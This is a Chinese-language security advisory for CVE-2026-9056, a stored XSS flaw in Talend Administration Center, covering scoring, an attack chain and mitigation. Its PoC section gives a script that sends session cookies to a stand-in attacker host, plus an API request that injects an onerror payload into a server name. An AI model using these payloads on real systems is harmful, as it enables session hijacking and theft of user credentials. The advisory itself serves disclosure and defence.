CVE-2026-9056 CVSS 5.4 中危

CVE-2026-9056 Talend Administration Center 存储型XSS漏洞

披露日期: 2026-05-20

来源: 4ac701fe-44e9-4bcd-9585-dd6449257611

漏洞信息

漏洞编号

CVE-2026-9056

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Talend Administration Center

漏洞概述

Talend Administration Center存在存储型跨站脚本漏洞。拥有服务器管理权限的攻击者可以在系统中植入恶意脚本载荷。当其他用户访问受感染的页面时，这些载荷将在其浏览器中执行，攻击者可借此窃取敏感信息或劫持用户会话。

技术细节

该漏洞的核心在于应用程序对用户可控的输入（如服务器名称、描述等字段）缺乏严格的输出编码。攻击者利用低权限账户登录后，在服务器管理功能处注入JavaScript代码。系统将恶意数据原样存储在数据库中。当管理员或其他用户浏览包含该数据的页面时，Web服务器直接输出未转义的内容，导致受害者的浏览器解析并执行攻击者提供的脚本。由于CVSS向量包含S:C（范围改变），攻击可能波及同一源下的其他组件，造成更广泛的安全影响。

攻击链分析

STEP 1

1. 获取访问权限

攻击者使用具有服务器管理权限的低权限账户登录Talend Administration Center。

STEP 2

2. 注入恶意载荷

攻击者在服务器管理界面的输入字段（如服务器名称或描述）中插入存储型XSS Payload（如<script>标签）。

STEP 3

3. 持久化存储

系统接收并保存攻击者的输入，由于缺乏过滤，恶意脚本被存储在后端数据库中。

STEP 4

4. 触发漏洞

当其他用户（特别是管理员）访问包含恶意服务器数据的页面时，服务器返回未转义的内容。

STEP 5

5. 执行攻击

受害者的浏览器解析并执行恶意脚本，导致Cookie被窃取或会话被劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept: Stored XSS in Server Name -->
<!-- Attacker inputs the following into the Server Name field -->

<script>
  // Simulate stealing the admin's session cookie
  var img = new Image();
  img.src = "http://attacker-controlled-server.com/steal?cookie=" + document.cookie;
  alert('XSS Triggered - CVE-2026-9056');
</script>

<!-- Alternatively, a payload to be sent via API -->
/*
POST /api/servers HTTP/1.1
Host: target-talend.com
Content-Type: application/json

{
  "name": "<img src=x onerror=alert('XSS')>",
  "label": "Malicious Server"
}
*/

影响范围

参考Qlik官方安全公告获取具体受影响版本

防御指南

临时缓解措施

在应用补丁前，应严格限制对服务器管理功能的访问权限，仅允许必要的人员操作。同时，建议用户在访问系统时提高警惕，不轻易点击不明链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表